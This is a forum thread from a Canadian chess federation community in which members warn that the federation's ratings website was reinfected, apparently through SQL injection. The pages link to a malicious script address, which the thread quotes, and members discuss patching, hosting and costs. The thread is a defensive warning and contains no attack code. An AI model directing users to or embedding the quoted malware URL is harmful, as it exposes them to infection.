CFC Website - Hacked Again ( New ) !

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • CFC Website - Hacked Again ( New ) !

    I thought these two prior posts needed to be brought to all members' attention, as they are a new warning about entering the ratings part of the CFC website ! EKG apparently did clean the last infection ( or didn't ), but now it has been hacked anew. So I am reposting the two posts:

    Quote:
    Originally Posted by Egidijus Zeromskis
    Sorry to say, but seems that the site (rating part) was hacked again.

    Now it has a link to "a0v.org/x.js"

    Posted by Steve Karpik:

    This is very sad. There are two possibilities. Either the contractors hired by the CFC to clean the database of infected strings didn't do a very good job. Or equally as bad they didn't implement a filter on input data to prevent further injection attacks. In either case, the CFC web site is still in bad shape.

    Some browsers like Chrome and Firefox will warn you not to visit the CFC web site. Internet Explorer won't do you that service. For the time being, I would recommend that CFC members don't query the web site for their ratings. After conducting a limited and unscientific survey of the CFC database, it seems that only some portion of the database has been infected but that's scant comfort if the data you're looking up is polluted with links to malware.

    It looks right now that a fully patched computer will block the malware that is being distributed through the link to "a0v.org/x.js"; however, it is probably best to be safe rather than sorry.

    As of mid-August, over 55,000 web sites worldwide had been compromised by this attack. That doesn't excuse the fact that the CFC web site is a mess -- it just shares its mess with 55,000 other badly maintained web sites.

    I'm sure the executive will have a statement on this shortly.

    Bob

  • #2
    Re: CFC Website - Hacked Again ( New ) !

    Bob: question for IT experts: Why was the CFC forum site not hacked?
    Was it ever? The CFC forum site is ChessTalk / Parlons Échecs - Powered by vBulletin. Does that fact
    make it immune to attacks. What are they using re IT language/system wise. Please remember I know nothing about this technical stuff. Just
    wondering.

    Wilf Ferner

    Comment


    • #3
      Re: CFC Website - Hacked Again ( New ) !

      Bob: here is an alternate idea for the CFC to consider re troublesome
      website:

      Create an official CFC blog. Blogs don't cost much. Ask some of the
      bloggers on the list "Canadian Chess Blogs".
      A blog can be linked to an existing website or you can set up and use the blog as your website.
      Blogs are good for keeping in touch with members, provide useful info like
      GLs,etc, and help attract visitors to the website because blogs can be
      interactive(replay games, show puzzles,etc)


      Wilf Ferner

      Comment


      • #4
        Re: CFC Website - Hacked Again ( New ) !

        Hi Wilf:

        I have to leave all this techie stuff to others - hopefully one of the executive will see your posting.

        Bob

        Comment


        • #5
          Re: CFC Website - Hacked Again ( New ) !

          Originally posted by Wilf Ferner View Post
          Bob: question for IT experts: Why was the CFC forum site not hacked?
          Was it ever? The CFC forum site is ChessTalk / Parlons Échecs - Powered by vBulletin. Does that fact
          make it immune to attacks. What are they using re IT language/system wise. Please remember I know nothing about this technical stuff. Just
          wondering.

          Wilf Ferner
          In order to avoid attacks you have to ensure that all patches and updates are applied to your systems and software. This will not stop infections but will reduce the window of vulnerability to the period between when an exploit is discovered and a patch or update is available that addresses that vulnerability.

          The CFC forum site uses newer technology and from what Bob Gillanders wrote was constantly being patched and backed up by Vincent Chow so it is probably up to date on security patches and updates at least up to the date that the CFC got rid of that effective team which turned around the CFC business operations.

          A good webhosting company will typically do much of that for you. If their hosting platform gets hacked it will typically affect hundreds or thousands of websites so they will tend to keep everything up to date.

          If the CFC keeps things hosted the way it is now I can guarantee that any new site will be hacked. It is inevitable. To date I haven't had any website that I have been involved in maintaining hacked despite having a number of psycho internet stalkers with access to and familiarity with all of the state of the art hacker tools (not that they are terribly bright but many of the tools make it easy for dumb people to hack sites and computers). Most of this is due to using professional hosting services that don't drop the ball and also keeping a low profile so that the stalkers don't know which websites are mine aside from vanity sites (which haven't been hacked either).

          Vladimir Drkulec
          Last edited by Vlad Drkulec; Monday, 21st September, 2009, 11:14 PM.

          Comment


          • #6
            Re: CFC Website - Hacked Again ( New ) !

            Actually, the forum site is completely separate and managed/maintained by me, not the office. It does use newer technology (PHP and MySQL), and it uses an older version of vB. I'm not exactly sure why it hasn't been hacked and Chesstalk has (twice I think?) even though CT uses a newer version of vB. (CT has been updated since the hacks so those vulnerabilities were closed).
            Christopher Mallon
            FIDE Arbiter

            Comment


            • #7
              Re: CFC Website - Hacked Again ( New ) !

              Originally posted by Christopher Mallon View Post
              Actually, the forum site is completely separate and managed/maintained by me, not the office. It does use newer technology (PHP and MySQL), and it uses an older version of vB. I'm not exactly sure why it hasn't been hacked and Chesstalk has (twice I think?) even though CT uses a newer version of vB. (CT has been updated since the hacks so those vulnerabilities were closed).
              From my understanding of what people have said, the attack was based on some kind of SQL injection vulnerability so the use of an up to date MySQL database implementation probably precludes this line of attack for now.

              Vladimir Drkulec

              Comment


              • #8
                Re: CFC Website - Hacked Again ( New ) !

                The database doesn't, but the front end (ie vB) does. It's all about filtering what gets inserted into the database.

                If they wanted to be really nasty, they could just insert a KILL statement and poof goes the whole database just like that. Which is why I agree that the CFC is being randomly targeted and not someone going after them on purpose.
                Christopher Mallon
                FIDE Arbiter

                Comment


                • #9
                  Re: CFC Website - Hacked Again ( New ) !

                  Kevin Spraggett's blog has an amusing take on all this today :)

                  ... Maybe I'm just groggy from waking up though, but I think he just makes fun of everyone (Except me, for once :() without actually saying what the CFC should do now.
                  Christopher Mallon
                  FIDE Arbiter

                  Comment


                  • #10
                    Re: CFC Website - Hacked Again ( New ) !

                    Bob, I am an objective observer to these technical threads with a ton of experience in software consulting. I am not 100% familiar with some of the newer tools but my experience working with every variety of software consultant / programmer / etc reminds me of the following :

                    1. Many ( not all ) technical people get enamoured with new software tools and often
                    with specific vendors. For example, in the 1990's Microsoft dominated several
                    markets and yet there were a ton of techies who hated Microsoft for no real
                    reason just an emotional one. This tends to cloud decisions sometimes.

                    2. Database technology hasn't fundamentally changed in twenty years. The main
                    changes would be interfaces ( e.g. GUI & Internet ), integration with new tools, and
                    performance upgrades.

                    3. It disturbs me that almost all of the advice being accepted is from a company
                    directly benefitting from the advice. In fact, recent events suggest that company
                    may be average at best in this area, but I add this might be in CFC's budget range.
                    The prior roles of some in the CFC itself during the CFC meltdown is also
                    a huge red flag.

                    4. Some of the advice offerred by others on here is far too technical and tools
                    oriented. You need an IT person with a business focus. What is important right
                    now is reliability, cost efficiency, and whatever works don't fix/change it. Make
                    sure procedures of staff are documented mini-handbook style. This can be done
                    by volunteers or the staff itself if possible.

                    In short, get back to a business focus and it is possible to find this in the IT world. The
                    real problem is you have a very small budget ( 10k, 20k is very small really ). The danger is by paying a smaller amount you get nothing lasting and have to repay again every few years.

                    Just my two cents.
                    Last edited by Duncan Smith; Tuesday, 22nd September, 2009, 01:59 PM.

                    Comment

                    Working...
                    X